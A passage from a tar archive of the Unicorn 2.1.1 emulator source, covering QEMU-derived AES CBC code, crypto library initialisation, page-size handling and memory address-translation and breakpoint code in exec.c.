24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[55]; } } rk += key->rounds << 2; #else /* !FULL_UNROLL */ /* * Nr - 1 full rounds: */ r = key->rounds >> 1; for (;;) { t0 = AES_Td0[(s0 >> 24) ] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[(s1 ) & 0xff] ^ rk[4]; t1 = AES_Td0[(s1 >> 24) ] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[(s2 ) & 0xff] ^ rk[5]; t2 = AES_Td0[(s2 >> 24) ] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[(s3 ) & 0xff] ^ rk[6]; t3 = AES_Td0[(s3 >> 24) ] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[(s0 ) & 0xff] ^ rk[7]; rk += 8; if (--r == 0) { break; } s0 = AES_Td0[(t0 >> 24) ] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[(t1 ) & 0xff] ^ rk[0]; s1 = AES_Td0[(t1 >> 24) ] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[(t2 ) & 0xff] ^ rk[1]; s2 = AES_Td0[(t2 >> 24) ] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[(t3 ) & 0xff] ^ rk[2]; s3 = AES_Td0[(t3 >> 24) ] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[(t0 ) & 0xff] ^ rk[3]; } #endif /* ?FULL_UNROLL */ /* * apply last round and * map cipher state to byte array block: */ s0 = (AES_Td4[(t0 >> 24) ] & 0xff000000) ^ (AES_Td4[(t3 >> 16) & 0xff] & 0x00ff0000) ^ 
(AES_Td4[(t2 >> 8) & 0xff] & 0x0000ff00) ^
         (AES_Td4[(t1 ) & 0xff] & 0x000000ff) ^
         rk[0];
    PUTU32(out , s0);
    s1 = (AES_Td4[(t1 >> 24) ] & 0xff000000) ^
         (AES_Td4[(t0 >> 16) & 0xff] & 0x00ff0000) ^
         (AES_Td4[(t3 >> 8) & 0xff] & 0x0000ff00) ^
         (AES_Td4[(t2 ) & 0xff] & 0x000000ff) ^
         rk[1];
    PUTU32(out + 4, s1);
    s2 = (AES_Td4[(t2 >> 24) ] & 0xff000000) ^
         (AES_Td4[(t1 >> 16) & 0xff] & 0x00ff0000) ^
         (AES_Td4[(t0 >> 8) & 0xff] & 0x0000ff00) ^
         (AES_Td4[(t3 ) & 0xff] & 0x000000ff) ^
         rk[2];
    PUTU32(out + 8, s2);
    s3 = (AES_Td4[(t3 >> 24) ] & 0xff000000) ^
         (AES_Td4[(t2 >> 16) & 0xff] & 0x00ff0000) ^
         (AES_Td4[(t1 >> 8) & 0xff] & 0x0000ff00) ^
         (AES_Td4[(t0 ) & 0xff] & 0x000000ff) ^
         rk[3];
    PUTU32(out + 12, s3);
}
#endif /* AES_ASM */

void AES_cbc_encrypt(const unsigned char *in, unsigned char *out,
                     const unsigned long length, const AES_KEY *key,
                     unsigned char *ivec, const int enc)
{
    unsigned long n;
    unsigned long len = length;
    unsigned char tmp[AES_BLOCK_SIZE];

    assert(in && out && key && ivec);

    if (enc) {
        while (len >= AES_BLOCK_SIZE) {
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                tmp[n] = in[n] ^ ivec[n];
            AES_encrypt(tmp, out, key);
            memcpy(ivec, out, AES_BLOCK_SIZE);
            len -= AES_BLOCK_SIZE;
            in += AES_BLOCK_SIZE;
            out += AES_BLOCK_SIZE;
        }
        if (len) {
            for (n = 0; n < len; ++n)
                tmp[n] = in[n] ^ ivec[n];
            for (n = len; n < AES_BLOCK_SIZE; ++n)
                tmp[n] = ivec[n];
            AES_encrypt(tmp, tmp, key);
            memcpy(out, tmp, AES_BLOCK_SIZE);
            memcpy(ivec, tmp, AES_BLOCK_SIZE);
        }
    } else {
        while (len >= AES_BLOCK_SIZE) {
            memcpy(tmp, in, AES_BLOCK_SIZE);
            AES_decrypt(in, out, key);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] ^= ivec[n];
            memcpy(ivec, tmp, AES_BLOCK_SIZE);
            len -= AES_BLOCK_SIZE;
            in += AES_BLOCK_SIZE;
            out += AES_BLOCK_SIZE;
        }
        if (len) {
            memcpy(tmp, in, AES_BLOCK_SIZE);
            AES_decrypt(tmp, tmp, key);
            for (n = 0; n < len; ++n)
                out[n] = tmp[n] ^ ivec[n];
            memcpy(ivec, tmp, AES_BLOCK_SIZE);
        }
    }
}
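/*
 * Usage sketch (illustrative only, not part of the original source; the
 * key, IV and buffer values below are assumptions made for the example):
 * encrypting then decrypting a 32-byte buffer in CBC mode. Note that
 * AES_cbc_encrypt updates ivec in place, so a fresh copy of the IV must
 * be used for decryption.
 *
 *   AES_KEY ek, dk;
 *   unsigned char k[16] = {0}, iv[16] = {0}, iv2[16] = {0};
 *   unsigned char pt[32] = {0}, ct[32], back[32];
 *   AES_set_encrypt_key(k, 128, &ek);
 *   AES_set_decrypt_key(k, 128, &dk);
 *   AES_cbc_encrypt(pt, ct, 32, &ek, iv, 1);
 *   AES_cbc_encrypt(ct, back, 32, &dk, iv2, 0);    (back now equals pt)
 */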
* */ #include "qemu/osdep.h" #include "crypto/init.h" #include "qapi/error.h" #include "qemu/thread.h" #ifdef CONFIG_GNUTLS #include <gnutls/gnutls.h> #include <gnutls/crypto.h> #endif #ifdef CONFIG_GCRYPT #include <gcrypt.h> #endif #include "crypto/random.h" /* #define DEBUG_GNUTLS */ /* * We need to init gcrypt threading if * * - gcrypt < 1.6.0 * */ #if (defined(CONFIG_GCRYPT) && \ (GCRYPT_VERSION_NUMBER < 0x010600)) #define QCRYPTO_INIT_GCRYPT_THREADS #else #undef QCRYPTO_INIT_GCRYPT_THREADS #endif #ifdef DEBUG_GNUTLS static void qcrypto_gnutls_log(int level, const char *str) { fprintf(stderr, "%d: %s", level, str); } #endif int qcrypto_init(void) { #ifdef QCRYPTO_INIT_GCRYPT_THREADS gcry_control(GCRYCTL_SET_THREAD_CBS, &qcrypto_gcrypt_thread_impl); #endif /* QCRYPTO_INIT_GCRYPT_THREADS */ #ifdef CONFIG_GNUTLS int ret; ret = gnutls_global_init(); if (ret < 0) { // error_setg(errp, // "Unable to initialize GNUTLS library: %s", // gnutls_strerror(ret)); return -1; } #ifdef DEBUG_GNUTLS gnutls_global_set_log_level(10); gnutls_global_set_log_function(qcrypto_gnutls_log); #endif #endif #ifdef CONFIG_GCRYPT if (!gcry_check_version(GCRYPT_VERSION)) { // error_setg(errp, "Unable to initialize gcrypt"); return -1; } gcry_control(GCRYCTL_INITIALIZATION_FINISHED, 0); #endif if (qcrypto_random_init() < 0) { return -1; } return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/exec-vary.c����������������������������������������������������������������������0000664�0000000�0000000�00000004620�14675241067�0016224�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Variable page size handling * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu-common.h" #define IN_EXEC_VARY 1 #include "exec/exec-all.h" #include <uc_priv.h> bool set_preferred_target_page_bits(struct uc_struct *uc, int bits) { /* * The target page size is the lowest common denominator for all * the CPUs in the system, so we can only make it smaller, never * larger. And we can't make it smaller once we've committed to * a particular size. 
     */
#ifdef TARGET_PAGE_BITS_VARY
    //assert(bits >= TARGET_PAGE_BITS_MIN);
    if (uc->init_target_page == NULL) {
        uc->init_target_page = calloc(1, sizeof(TargetPageBits));
    } else {
        return false;
    }

    if (bits < TARGET_PAGE_BITS_MIN) {
        return false;
    }

    if (uc->init_target_page->bits == 0 || uc->init_target_page->bits > bits) {
        if (uc->init_target_page->decided) {
            return false;
        }
        uc->init_target_page->bits = bits;
    }
#endif
    return true;
}

void finalize_target_page_bits(struct uc_struct *uc)
{
#ifdef TARGET_PAGE_BITS_VARY
    if (uc->init_target_page == NULL) {
        uc->init_target_page = calloc(1, sizeof(TargetPageBits));
    } else {
        return;
    }

    if (uc->target_bits != 0) {
        uc->init_target_page->bits = uc->target_bits;
    }

    if (uc->init_target_page->bits == 0) {
        uc->init_target_page->bits = TARGET_PAGE_BITS_MIN;
    }

    uc->init_target_page->mask = ((target_ulong)-1) << uc->init_target_page->bits;
    uc->init_target_page->decided = true;

    /*
     * For the benefit of an -flto build, prevent the compiler from
     * hoisting a read from target_page before we finish initializing.
     */
    barrier();
#endif
}

unicorn-2.1.1/qemu/exec.c

/*
 * Virtual page mapping
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "qemu-common.h"
#include "exec/cpu-defs.h"
#include "cpu.h"
#include "qemu/cutils.h"
#include "exec/exec-all.h"
#include "exec/target_page.h"
#include "tcg/tcg.h"
#include "sysemu/sysemu.h"
#include "sysemu/tcg.h"
#include "qemu/timer.h"
#include "exec/memory.h"
#include "exec/ioport.h"

#ifdef CONFIG_FALLOCATE_PUNCH_HOLE
#include <linux/falloc.h>
#endif

#include "accel/tcg/translate-all.h"
#include "exec/memory-internal.h"
#include "exec/ram_addr.h"
#include "qemu/range.h"
#include "qemu/rcu_queue.h"

#include "uc_priv.h"

typedef struct PhysPageEntry PhysPageEntry;

struct PhysPageEntry {
    /* How many bits skip to next level (in units of L2_SIZE). 0 for a leaf. */
    uint32_t skip : 6;
    /* index into phys_sections (!skip) or phys_map_nodes (skip) */
    uint32_t ptr : 26;
};

#define PHYS_MAP_NODE_NIL (((uint32_t)~0) >> 6)

/* Size of the L2 (and L3, etc) page tables.
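 * (Worked example, an illustrative addition to the original comment: with
 * P_L2_BITS = 9 each level holds P_L2_SIZE = 512 entries, and for
 * ADDR_SPACE_BITS = 64 with, say, 12-bit target pages the level count is
 * P_L2_LEVELS = ((64 - 12 - 1) / 9) + 1 = 6.)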
*/ #define ADDR_SPACE_BITS 64 #define P_L2_BITS 9 #define P_L2_SIZE (1 << P_L2_BITS) #define P_L2_LEVELS (((ADDR_SPACE_BITS - TARGET_PAGE_BITS - 1) / P_L2_BITS) + 1) typedef PhysPageEntry Node[P_L2_SIZE]; typedef struct PhysPageMap { unsigned sections_nb; unsigned sections_nb_alloc; unsigned nodes_nb; unsigned nodes_nb_alloc; Node *nodes; MemoryRegionSection *sections; } PhysPageMap; struct AddressSpaceDispatch { MemoryRegionSection *mru_section; /* This is a multi-level map on the physical address space. * The bottom level has pointers to MemoryRegionSections. */ PhysPageEntry phys_map; PhysPageMap map; struct uc_struct *uc; }; #define SUBPAGE_IDX(addr) ((addr) & ~TARGET_PAGE_MASK) typedef struct subpage_t { MemoryRegion iomem; FlatView *fv; hwaddr base; uint16_t sub_section[]; } subpage_t; #define PHYS_SECTION_UNASSIGNED 0 static void tcg_commit(MemoryListener *listener); /** * CPUAddressSpace: all the information a CPU needs about an AddressSpace * @cpu: the CPU whose AddressSpace this is * @as: the AddressSpace itself * @memory_dispatch: its dispatch pointer (cached, RCU protected) * @tcg_as_listener: listener for tracking changes to the AddressSpace */ struct CPUAddressSpace { CPUState *cpu; AddressSpace *as; struct AddressSpaceDispatch *memory_dispatch; MemoryListener tcg_as_listener; }; static void phys_map_node_reserve(AddressSpaceDispatch *d, PhysPageMap *map, unsigned nodes) { if (map->nodes_nb + nodes > map->nodes_nb_alloc) { map->nodes_nb_alloc = MAX(d->uc->alloc_hint, map->nodes_nb + nodes); map->nodes = g_renew(Node, map->nodes, map->nodes_nb_alloc); d->uc->alloc_hint = map->nodes_nb_alloc; } } static uint32_t phys_map_node_alloc(PhysPageMap *map, bool leaf) { unsigned i; uint32_t ret; PhysPageEntry e; PhysPageEntry *p; ret = map->nodes_nb++; p = map->nodes[ret]; assert(ret != PHYS_MAP_NODE_NIL); assert(ret != map->nodes_nb_alloc); e.skip = leaf ? 0 : 1; e.ptr = leaf ? PHYS_SECTION_UNASSIGNED : PHYS_MAP_NODE_NIL; for (i = 0; i < P_L2_SIZE; ++i) { memcpy(&p[i], &e, sizeof(e)); } return ret; } static void phys_page_set_level(PhysPageMap *map, PhysPageEntry *lp, hwaddr *index, uint64_t *nb, uint16_t leaf, int level) { PhysPageEntry *p; hwaddr step = (hwaddr)1 << (level * P_L2_BITS); if (lp->skip && lp->ptr == PHYS_MAP_NODE_NIL) { lp->ptr = phys_map_node_alloc(map, level == 0); } p = map->nodes[lp->ptr]; lp = &p[(*index >> (level * P_L2_BITS)) & (P_L2_SIZE - 1)]; while (*nb && lp < &p[P_L2_SIZE]) { if ((*index & (step - 1)) == 0 && *nb >= step) { lp->skip = 0; lp->ptr = leaf; *index += step; *nb -= step; } else { phys_page_set_level(map, lp, index, nb, leaf, level - 1); } ++lp; } } static void phys_page_set(AddressSpaceDispatch *d, hwaddr index, uint64_t nb, uint16_t leaf) { #ifdef TARGET_ARM struct uc_struct *uc = d->uc; #endif /* Wildly overreserve - it doesn't matter much. */ phys_map_node_reserve(d, &d->map, 3 * P_L2_LEVELS); phys_page_set_level(&d->map, &d->phys_map, &index, &nb, leaf, P_L2_LEVELS - 1); } /* Compact a non leaf page entry. Simply detect that the entry has a single child, * and update our entry so we can skip it and go directly to the destination. 
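 * (Illustrative addition, not part of the original comment: when a node's
 * only valid child is itself a node, the parent absorbs the child's skip
 * count - see lp->skip += p[valid_ptr].skip below - so a later
 * phys_page_find() walk descends several levels in a single step.)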
*/ static void phys_page_compact(struct uc_struct *uc, PhysPageEntry *lp, Node *nodes) { unsigned valid_ptr = P_L2_SIZE; int valid = 0; PhysPageEntry *p; int i; if (lp->ptr == PHYS_MAP_NODE_NIL) { return; } p = nodes[lp->ptr]; for (i = 0; i < P_L2_SIZE; i++) { if (p[i].ptr == PHYS_MAP_NODE_NIL) { continue; } valid_ptr = i; valid++; if (p[i].skip) { phys_page_compact(uc, &p[i], nodes); } } /* We can only compress if there's only one child. */ if (valid != 1) { return; } assert(valid_ptr < P_L2_SIZE); /* Don't compress if it won't fit in the # of bits we have. */ if (P_L2_LEVELS >= (1 << 6) && lp->skip + p[valid_ptr].skip >= (1 << 6)) { return; } lp->ptr = p[valid_ptr].ptr; if (!p[valid_ptr].skip) { /* If our only child is a leaf, make this a leaf. */ /* By design, we should have made this node a leaf to begin with so we * should never reach here. * But since it's so simple to handle this, let's do it just in case we * change this rule. */ lp->skip = 0; } else { lp->skip += p[valid_ptr].skip; } } void address_space_dispatch_compact(AddressSpaceDispatch *d) { if (d->phys_map.skip) { phys_page_compact(d->uc, &d->phys_map, d->map.nodes); } } static inline bool section_covers_addr(const MemoryRegionSection *section, hwaddr addr) { /* Memory topology clips a memory region to [0, 2^64); size.hi > 0 means * the section must cover the entire address space. */ return int128_gethi(section->size) || range_covers_byte(section->offset_within_address_space, int128_getlo(section->size), addr); } static MemoryRegionSection *phys_page_find(AddressSpaceDispatch *d, hwaddr addr) { #ifdef TARGET_ARM struct uc_struct *uc = d->uc; #endif PhysPageEntry lp = d->phys_map, *p; Node *nodes = d->map.nodes; MemoryRegionSection *sections = d->map.sections; hwaddr index = addr >> TARGET_PAGE_BITS; int i; for (i = P_L2_LEVELS; lp.skip && (i -= lp.skip) >= 0;) { if (lp.ptr == PHYS_MAP_NODE_NIL) { return &sections[PHYS_SECTION_UNASSIGNED]; } p = nodes[lp.ptr]; lp = p[(index >> (i * P_L2_BITS)) & (P_L2_SIZE - 1)]; } if (section_covers_addr(&sections[lp.ptr], addr)) { return &sections[lp.ptr]; } else { return &sections[PHYS_SECTION_UNASSIGNED]; } } /* Called from RCU critical section */ static MemoryRegionSection *address_space_lookup_region(AddressSpaceDispatch *d, hwaddr addr, bool resolve_subpage) { #ifdef TARGET_ARM struct uc_struct *uc = d->uc; #endif MemoryRegionSection *section = d->mru_section; subpage_t *subpage; if (!section || section == &d->map.sections[PHYS_SECTION_UNASSIGNED] || !section_covers_addr(section, addr)) { section = phys_page_find(d, addr); d->mru_section = section; } if (resolve_subpage && section->mr->subpage) { subpage = container_of(section->mr, subpage_t, iomem); section = &d->map.sections[subpage->sub_section[SUBPAGE_IDX(addr)]]; } return section; } /* Called from RCU critical section */ static MemoryRegionSection * address_space_translate_internal(AddressSpaceDispatch *d, hwaddr addr, hwaddr *xlat, hwaddr *plen, bool resolve_subpage) { MemoryRegionSection *section; MemoryRegion *mr; Int128 diff; section = address_space_lookup_region(d, addr, resolve_subpage); /* Compute offset within MemoryRegionSection */ addr -= section->offset_within_address_space; /* Compute offset within MemoryRegion */ *xlat = addr + section->offset_within_region; mr = section->mr; /* MMIO registers can be expected to perform full-width accesses based only * on their address, without considering adjacent registers that could * decode to completely different MemoryRegions. When such registers * exist (e.g.
I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO * regions overlap wildly. For this reason we cannot clamp the accesses * here. * * If the length is small (as is the case for address_space_ldl/stl), * everything works fine. If the incoming length is large, however, * the caller really has to do the clamping through memory_access_size. */ if (memory_region_is_ram(mr)) { diff = int128_sub(section->size, int128_make64(addr)); *plen = int128_get64(int128_min(diff, int128_make64(*plen))); } return section; } /** * address_space_translate_iommu - translate an address through an IOMMU * memory region and then through the target address space. * * @iommu_mr: the IOMMU memory region that we start the translation from * @addr: the address to be translated through the MMU * @xlat: the translated address offset within the destination memory region. * It cannot be %NULL. * @plen_out: valid read/write length of the translated address. It * cannot be %NULL. * @page_mask_out: page mask for the translated address. This * should only be meaningful for IOMMU translated * addresses, since there may be huge pages that this bit * would tell. It can be %NULL if we don't care about it. * @is_write: whether the translation operation is for write * @is_mmio: whether this can be MMIO, set true if it can * @target_as: the address space targeted by the IOMMU * @attrs: transaction attributes * * This function is called from RCU critical section. It is the common * part of flatview_do_translate and address_space_translate_cached. */ static MemoryRegionSection address_space_translate_iommu(IOMMUMemoryRegion *iommu_mr, hwaddr *xlat, hwaddr *plen_out, hwaddr *page_mask_out, bool is_write, bool is_mmio, AddressSpace **target_as, MemTxAttrs attrs) { MemoryRegionSection *section; hwaddr page_mask = (hwaddr)-1; MemoryRegion *mr = MEMORY_REGION(iommu_mr); do { hwaddr addr = *xlat; IOMMUMemoryRegionClass *imrc = memory_region_get_iommu_class_nocheck(iommu_mr); int iommu_idx = 0; IOMMUTLBEntry iotlb; if (imrc->attrs_to_index) { iommu_idx = imrc->attrs_to_index(iommu_mr, attrs); } iotlb = imrc->translate(iommu_mr, addr, is_write ? IOMMU_WO : IOMMU_RO, iommu_idx); if (!(iotlb.perm & (1 << is_write))) { goto unassigned; } addr = ((iotlb.translated_addr & ~iotlb.addr_mask) | (addr & iotlb.addr_mask)); page_mask &= iotlb.addr_mask; *plen_out = MIN(*plen_out, (addr | iotlb.addr_mask) - addr + 1); *target_as = iotlb.target_as; section = address_space_translate_internal( address_space_to_dispatch(iotlb.target_as), addr, xlat, plen_out, is_mmio); iommu_mr = memory_region_get_iommu(section->mr); } while (unlikely(iommu_mr)); if (page_mask_out) { *page_mask_out = page_mask; } return *section; unassigned: return (MemoryRegionSection) { .mr = &(mr->uc->io_mem_unassigned) }; } /** * flatview_do_translate - translate an address in FlatView * * @fv: the flat view that we want to translate on * @addr: the address to be translated in above address space * @xlat: the translated address offset within memory region. It * cannot be @NULL. * @plen_out: valid read/write length of the translated address. It * can be @NULL when we don't care about it. * @page_mask_out: page mask for the translated address. This * should only be meaningful for IOMMU translated * addresses, since there may be huge pages that this bit * would tell. It can be @NULL if we don't care about it. 
* @is_write: whether the translation operation is for write * @is_mmio: whether this can be MMIO, set true if it can * @target_as: the address space targeted by the IOMMU * @attrs: memory transaction attributes * * This function is called from RCU critical section */ static MemoryRegionSection flatview_do_translate(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr *xlat, hwaddr *plen_out, hwaddr *page_mask_out, bool is_write, bool is_mmio, AddressSpace **target_as, MemTxAttrs attrs) { MemoryRegionSection *section; IOMMUMemoryRegion *iommu_mr; hwaddr plen = (hwaddr)(-1); if (!plen_out) { plen_out = &plen; } section = address_space_translate_internal( flatview_to_dispatch(fv), addr, xlat, plen_out, is_mmio); iommu_mr = memory_region_get_iommu(section->mr); if (unlikely(iommu_mr)) { return address_space_translate_iommu(iommu_mr, xlat, plen_out, page_mask_out, is_write, is_mmio, target_as, attrs); } if (page_mask_out) { /* Not behind an IOMMU, use default page size. */ *page_mask_out = ~TARGET_PAGE_MASK; } return *section; } /* Called from RCU critical section */ MemoryRegion *flatview_translate(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr *xlat, hwaddr *plen, bool is_write, MemTxAttrs attrs) { MemoryRegion *mr; MemoryRegionSection section; AddressSpace *as = NULL; /* This can be MMIO, so setup MMIO bit. */ section = flatview_do_translate(uc, fv, addr, xlat, plen, NULL, is_write, true, &as, attrs); mr = section.mr; return mr; } /* Called from RCU critical section */ MemoryRegionSection * address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr, hwaddr *xlat, hwaddr *plen, MemTxAttrs attrs, int *prot) { MemoryRegionSection *section; IOMMUMemoryRegion *iommu_mr; IOMMUMemoryRegionClass *imrc; IOMMUTLBEntry iotlb; int iommu_idx; AddressSpaceDispatch *d = cpu->cpu_ases[asidx].memory_dispatch; for (;;) { section = address_space_translate_internal(d, addr, &addr, plen, false); iommu_mr = memory_region_get_iommu(section->mr); if (!iommu_mr) { break; } imrc = memory_region_get_iommu_class_nocheck(iommu_mr); iommu_idx = imrc->attrs_to_index(iommu_mr, attrs); // tcg_register_iommu_notifier(cpu, iommu_mr, iommu_idx); /* We need all the permissions, so pass IOMMU_NONE so the IOMMU * doesn't short-cut its translation table walk. */ iotlb = imrc->translate(iommu_mr, addr, IOMMU_NONE, iommu_idx); addr = ((iotlb.translated_addr & ~iotlb.addr_mask) | (addr & iotlb.addr_mask)); /* Update the caller's prot bits to remove permissions the IOMMU * is giving us a failure response for. If we get down to no * permissions left at all we can give up now. */ if (!(iotlb.perm & IOMMU_RO)) { *prot &= ~(PAGE_READ | PAGE_EXEC); } if (!(iotlb.perm & IOMMU_WO)) { *prot &= ~PAGE_WRITE; } if (!*prot) { goto translate_fail; } d = flatview_to_dispatch(address_space_to_flatview(iotlb.target_as)); } assert(!(memory_region_get_iommu(section->mr) != NULL)); *xlat = addr; // Unicorn: // If no memory is mapped but emulation is started anyway, we will get // a default memory region section and it would be marked as IO memory // in cputlb, which prevents further fetching and execution. // // The reason we set prot to 0 here is not to set protection but to notify // the outer function to add a new **blank** tlb which will never be hit.
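// (Illustrative addition, not in the original comment: a *prot of 0 makes
// the caller install a TLB entry with no permission bits set, so every
// later access to that page faults back out of the fast path, giving
// Unicorn the chance to report the unmapped access to the user.)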
if (!memory_region_is_ram(section->mr) && section == &d->map.sections[PHYS_SECTION_UNASSIGNED]) { *prot = 0; } return section; translate_fail: return &d->map.sections[PHYS_SECTION_UNASSIGNED]; } CPUState *qemu_get_cpu(struct uc_struct *uc, int index) { CPUState *cpu = uc->cpu; if (cpu->cpu_index == index) { return cpu; } return NULL; } void cpu_address_space_init(CPUState *cpu, int asidx, MemoryRegion *mr) { /* Target code should have set num_ases before calling us */ assert(asidx < cpu->num_ases); if (!cpu->cpu_ases) { cpu->cpu_ases = g_new0(CPUAddressSpace, cpu->num_ases); cpu->cpu_ases[0].cpu = cpu; cpu->cpu_ases[0].as = &(cpu->uc->address_space_memory); cpu->cpu_ases[0].tcg_as_listener.commit = tcg_commit; memory_listener_register(&(cpu->cpu_ases[0].tcg_as_listener), cpu->cpu_ases[0].as); } /* arm security memory */ if (asidx > 0) { cpu->cpu_ases[asidx].cpu = cpu; cpu->cpu_ases[asidx].as = &(cpu->uc->address_space_memory); cpu->cpu_ases[asidx].tcg_as_listener.commit = tcg_commit; memory_listener_register(&(cpu->cpu_ases[asidx].tcg_as_listener), cpu->cpu_ases[asidx].as); } } AddressSpace *cpu_get_address_space(CPUState *cpu, int asidx) { /* only one AddressSpace. */ return cpu->cpu_ases[0].as; } void cpu_exec_unrealizefn(CPUState *cpu) { } void cpu_exec_initfn(CPUState *cpu) { cpu->num_ases = 1; cpu->as = &(cpu->uc->address_space_memory); cpu->memory = cpu->uc->system_memory; } void cpu_exec_realizefn(CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->tcg_initialize(cpu->uc); tlb_init(cpu); } void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr, MemTxAttrs attrs) { ram_addr_t ram_addr; MemoryRegion *mr; hwaddr l = 1; mr = address_space_translate(as, addr, &addr, &l, false, attrs); if (!memory_region_is_ram(mr)) { return; } ram_addr = memory_region_get_ram_addr(mr) + addr; tb_invalidate_phys_page_range(as->uc, ram_addr, ram_addr + 1); } static void breakpoint_invalidate(CPUState *cpu, target_ulong pc) { /* * There may not be a virtual to physical translation for the pc * right now, but there may exist cached TB for this pc. * Flush the whole TB cache to force re-translation of such TBs. * This is heavyweight, but we're debugging anyway. */ tb_flush(cpu); } /* Add a watchpoint. */ int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, int flags, CPUWatchpoint **watchpoint) { #if 0 CPUWatchpoint *wp; /* forbid ranges which are empty or run off the end of the address space */ if (len == 0 || (addr + len - 1) < addr) { error_report("tried to set invalid watchpoint at %" VADDR_PRIx ", len=%" VADDR_PRIu, addr, len); return -EINVAL; } wp = g_malloc(sizeof(*wp)); wp->vaddr = addr; wp->len = len; wp->flags = flags; /* keep all GDB-injected watchpoints in front */ if (flags & BP_GDB) { QTAILQ_INSERT_HEAD(&cpu->watchpoints, wp, entry); } else { QTAILQ_INSERT_TAIL(&cpu->watchpoints, wp, entry); } tlb_flush_page(cpu, addr); if (watchpoint) *watchpoint = wp; #endif return 0; } /* Remove a specific watchpoint by reference. */ void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint) { #if 0 QTAILQ_REMOVE(&cpu->watchpoints, watchpoint, entry); tlb_flush_page(cpu, watchpoint->vaddr); g_free(watchpoint); #endif } /* Remove all matching watchpoints. */ void cpu_watchpoint_remove_all(CPUState *cpu, int mask) { #if 0 CPUWatchpoint *wp, *next; QTAILQ_FOREACH_SAFE(wp, &cpu->watchpoints, entry, next) { if (wp->flags & mask) { cpu_watchpoint_remove_by_ref(cpu, wp); } } #endif } /* Return flags for watchpoints that match addr + prot. 
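 * (Note added for clarity, not in the original comment: like the other
 * watchpoint helpers above, the body below is compiled out with #if 0 in
 * this Unicorn build, so the function always reports that nothing matched.)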
*/ int cpu_watchpoint_address_matches(CPUState *cpu, vaddr addr, vaddr len) { #if 0 CPUWatchpoint *wp; int ret = 0; QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { if (watchpoint_address_matches(wp, addr, TARGET_PAGE_SIZE)) { ret |= wp->flags; } } return ret; #endif return 0; } /* Add a breakpoint. */ int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, CPUBreakpoint **breakpoint) { CPUBreakpoint *bp; bp = g_malloc(sizeof(*bp)); bp->pc = pc; bp->flags = flags; /* keep all GDB-injected breakpoints in front */ if (flags & BP_GDB) { QTAILQ_INSERT_HEAD(&cpu->breakpoints, bp, entry); } else { QTAILQ_INSERT_TAIL(&cpu->breakpoints, bp, entry); } breakpoint_invalidate(cpu, pc); if (breakpoint) { *breakpoint = bp; } return 0; } /* Remove a specific breakpoint. */ int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags) { CPUBreakpoint *bp; QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { if (bp->pc == pc && bp->flags == flags) { cpu_breakpoint_remove_by_ref(cpu, bp); return 0; } } return -ENOENT; } /* Remove a specific breakpoint by reference. */ void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint) { QTAILQ_REMOVE(&cpu->breakpoints, breakpoint, entry); breakpoint_invalidate(cpu, breakpoint->pc); g_free(breakpoint); } /* Remove all matching breakpoints. */ void cpu_breakpoint_remove_all(CPUState *cpu, int mask) { CPUBreakpoint *bp, *next; QTAILQ_FOREACH_SAFE(bp, &cpu->breakpoints, entry, next) { if (bp->flags & mask) { cpu_breakpoint_remove_by_ref(cpu, bp); } } } void cpu_abort(CPUState *cpu, const char *fmt, ...) { abort(); } /* Called from RCU critical section */ static RAMBlock *qemu_get_ram_block(struct uc_struct *uc, ram_addr_t addr) { RAMBlock *block; block = uc->ram_list.mru_block; if (block && 